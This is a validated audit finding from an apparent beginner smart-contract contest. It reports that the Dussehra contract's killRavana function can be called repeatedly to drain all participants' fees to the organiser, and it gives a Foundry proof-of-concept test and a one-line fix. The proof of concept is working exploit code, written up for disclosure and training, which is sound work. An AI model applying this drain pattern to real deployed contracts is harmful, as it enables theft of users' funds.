First Flight #17: Dussehra
First Flight #17
Beginner FriendlyFoundryNFT
100 EXP
View results
Previous Next
Submission Details
Severity: medium
Valid

`IsRavanKilled` in `Dussehra::KillRavana` Function is Always True which lead to Malicious Behavior or Repeated Execution in `Dussehra::KillRavana` Function

nem0x001

IsRavanKilled in Dussehra::KillRavana Function is Always True which lead to Malicious Behavior or Repeated Execution in Dussehra::KillRavana Function

Description:

The Dussehra::KillRavana function contains a vulnerability that allows the organiser to act maliciously and steal all the event participants' money, without providing any rewards to the users who have chosen to be "Ram" (i.e., the participants).or the if the organiser is not malicous since the Dussehra::KillRavana has no access control once it called by any particpant more than once it will lead to same result which draining protocol money and send it all to organiser.

function killRavana() public RamIsSelected {
if (block.timestamp < 1728691069) {
revert Dussehra__MahuratIsNotStart();
}
if (block.timestamp > 1728777669) {
revert Dussehra__MahuratIsFinished();
}
IsRavanKilled = true;
uint256 totalAmountByThePeople = WantToBeLikeRam.length * entranceFee;
totalAmountGivenToRam = (totalAmountByThePeople * 50) / 100;
(bool success, ) = organiser.call{value: totalAmountGivenToRam}("");
require(success, "Failed to send money to organiser");
}

Impact:

  • Stolen Funds: The organiser can manipulate the function to transfer all the collected funds to themselves, leaving participants without their expected rewards. This leads to financial loss for all users who contributed to the event.

  • Zero Payouts for Ram Participants: By manipulating totalAmountGivenToRam, the organiser can ensure that participants cannot withdraw their share, effectively stealing all the funds intended for the users.

Proof of Concept:
Use the following PoC in Dussehra.t.sol

```js

//@author:nem0x001
function test_MalicousOrganizer () public  participants  {
//Participants modifier enters 2 users with fee 1e18 for every user 
//1- ChoosingRam
    vm.warp(1728691200 + 1);
    vm.startPrank(organiser);
    choosingRam.selectRamIfNotSelected();
    vm.stopPrank();

//2- calling killRavana multiple times 
uint organiserIntialBalance=address(organiser).balance;//0
uint dussehraIntialBalance=address(dussehra).balance; // 2e18 come from modifier 

    vm.startPrank(player1);
    console.log("OrganizerIntialBalance :",address(organiser).balance);
    console.log("DussehraIntialBalance:",address(dussehra).balance);
    //first call
    dussehra.killRavana( );
    
    console.log("OrganizerBalanceAfterFirstCall :",address(organiser).balance);
    console.log("DussehraBalanceAfterFirstCall:",address(dussehra).balance);

    // 50% will go to organiser and 50% to ram 
    // which means in This case 
    // 1e18 for organiser and remain 1e18 will remain in the contract for ram
    assert(address(organiser).balance==address(dussehra).balance);

    //second call

    dussehra.killRavana( );
    console.log("OrganizerBalanceAfterSecondCall :",address(organiser).balance);
    console.log("DussehraBalanceAfterSecondCall:",address(dussehra).balance);
    assertEq(address(dussehra).balance,0);
    assertEq(address(organiser).balance,dussehraIntialBalance+organiserIntialBalance);

    vm.stopPrank();
}

```
**Recommended Mitigation:** + Use Access Control which prevent killingRavana Multiple Times
function killRavana() public RamIsSelected {
if (block.timestamp < 1728691069) {
revert Dussehra__MahuratIsNotStart();
}
if (block.timestamp > 1728777669) {
revert Dussehra__MahuratIsFinished();
}
+ if (IsRavanKilled){
+ revert(RavanaIsAlreadyKilled());
+ }
IsRavanKilled = true;
uint256 totalAmountByThePeople = WantToBeLikeRam.length * entranceFee;
totalAmountGivenToRam = (totalAmountByThePeople * 50) / 100;
(bool success, ) = organiser.call{value: totalAmountGivenToRam}("");
require(success, "Failed to send money to organiser");
}
Updates

Lead Judging Commences

bube Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

isRavanKilled is not checked

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.